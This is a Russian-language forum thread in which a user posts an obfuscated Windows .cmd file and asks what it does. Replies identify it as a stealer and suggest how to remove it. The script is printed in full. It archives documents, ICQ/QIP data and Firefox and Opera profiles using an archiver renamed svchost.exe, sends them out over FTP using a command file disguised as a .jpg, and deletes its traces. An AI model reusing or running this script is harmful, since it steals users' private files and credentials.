кто шарит подскажите что творит это .cmd файл
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
кто шарит подскажите что творит это .cmd файл - 2010-09-30 07:53:43.410000
|
|
|
dfanat
Сообщений: 8
Оценки: 0
Присоединился: 2008-08-23 14:46:07.950000
|
@echo off
: pkhijxtrikvueonydpvwgfebandmuudqaw
:UA-inch v.0.2. from Kiev with love!
:gipkejsjizo
:fisylowxlfkezxcdzuohrpavdpxcumjsmpaymbu
svchost.exe a -r %username%_xls_%random%.arj %systemdrive%Docume~1*.xls?
ftp -n -s:ffzjoqpb.jpg
del /s /f /a /q *.arj
:tstat
svchost.exe a -r %username%_qip_%random%.arj %systemdrive%progra~1qipusers
ftp -n -s:ffzjoqpb.jpg
del /s /a /f /q *.arj
:afmzddubhrdwywsojiamjpahfsvgtbdxfznb
svchost.exe a -r %username%_doc_%random%.arj %systemdrive%Docume~1*.doc?
ftp -n -s:ffzjoqpb.jpg
del /f /a /q /s *.arj
:dnqlowutuoliszx
:oprysfjvveanxcpfhozlbcifvzeyen
taskkill /im firefox.exe /f /t
svchost.exe a -r %username%_fox_%random%.arj %systemdrive%Docume~1%username%Applic~1MozillaFirefox
ftp -n -s:ffzjoqpb.jpg
del /a /q /f /s *.arj
:svxuuhhxsnsrxhxkxrgureasyadwcxwqnoizn
taskkill /im opera.exe /f /t
svchost.exe a -r %username%_ora_%random%.arj %systemdrive%Docume~1%username%Applic~1OperaOpera
ftp -n -s:ffzjoqpb.jpg
del /q /s /a /f *.arj
:wue
:ysvlkaqkkqalcqlhpselkdgqucbjyfkgmxwptut
svchost.exe a -r %username%_icq6_%random%.arj %systemdrive%Docume~1%username%Applic~1ICQ
ftp -n -s:ffzjoqpb.jpg
del /s /q /a /f *.arj
:ysvlkaqkkqalcqlhpselkdgqucbjyfkgmxwptut
svchost.exe a -r %username%_rar_%random%.arj %systemdrive%Docume~1%username%*.rar
ftp -n -s:ffzjoqpb.jpg
del /s /q /a /f *.arj
:jqrzqjmsuhrcclyykmnr
:ysvlkaqkkqalcqlhpselkdgqucbjyfkgmxwptut
svchost.exe a -r %username%_documents_%random%.arj %systemdrive%Docume~1%username%
ftp -n -s:ffzjoqpb.jpg
del /s /q /a /f *.arj
:jqrzqjmsuhrcclyykmnr
del /a /s /q /f %temp%*.*
:fsuhogplvyxqgtagdenscrmmpfofcftjiroqjq
:ynaareuynktqpqwiysogrkdthnhntlwbwvdw
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2010-09-30 08:26:53.176666
|
|
|
hromjo_forever
Сообщений: 119
Оценки: 0
Присоединился: 2010-08-02 12:45:32.986666
|
Удаляет какие-то файлы. Ворует что-то из кипа.
Короче не чего хорошего.
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2010-09-30 10:31:05.113333
|
|
|
Papa James
Сообщений: 438
Оценки: 0
Присоединился: 2009-12-07 13:36:18.370000
|
Тырит самые "важные" данные. историю кипа, браузеров, все документы и архивы в папке "Document and Settings"
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2010-10-06 06:09:59.750000
|
|
|
CepbIu
Сообщений: 391
Оценки: 0
Присоединился: 2010-06-26 05:35:50.293333
|
+ закрывает оперу и огнелиса
+ чистит всё за собой
+ чистит папку временных файлов
всё это происходит от того пользователя который запустил
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2010-10-23 15:26:36.733333
|
|
|
Tester_Egor4ik
Сообщений: 161
Оценки: 0
Присоединился: 2009-10-15 15:45:32.776666
|
Открой ffzjoqpb.jpg блокнотом и смени ему пасс :)
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2010-11-18 19:09:58.643333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
ffzjoqpb.jpg - удалить
сам cmd файлик тоже
и поубивай svchost'ы (тока те, которые от имени юзера запущены))
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2011-05-07 15:52:39.083333
|
|
|
m0nstr
Сообщений: 58
Оценки: 0
Присоединился: 2010-08-30 19:11:36.590000
|
Проверь антивирем все и все будет в норме
|
|
|
|
|
RE: кто шарит подскажите что творит это .cmd файл - 2011-05-08 16:51:37.126666
|
|
|
xBuRoGoZx
Сообщений: 9
Оценки: 0
Присоединился: 2011-05-08 16:15:25.666666
|
ворует файлы *.xls, *.doc, *.arj, после удаляет эти файлы. Насколько я понял, он часто обращается к файлу ffzjoqpb.jpg. Возможно, он скопировал себя в этот файл. Хотя я в этом не уверен. Может быть, нет. После он убивает процесс opera.exe, ворует папку оперы (куки, история и т.п.). Ворует папку ICQ, архивы *.rar, после ворует папку пользователя (текущего), полностью опустошает папку %TEMP%.
|
|
|
|
|
|
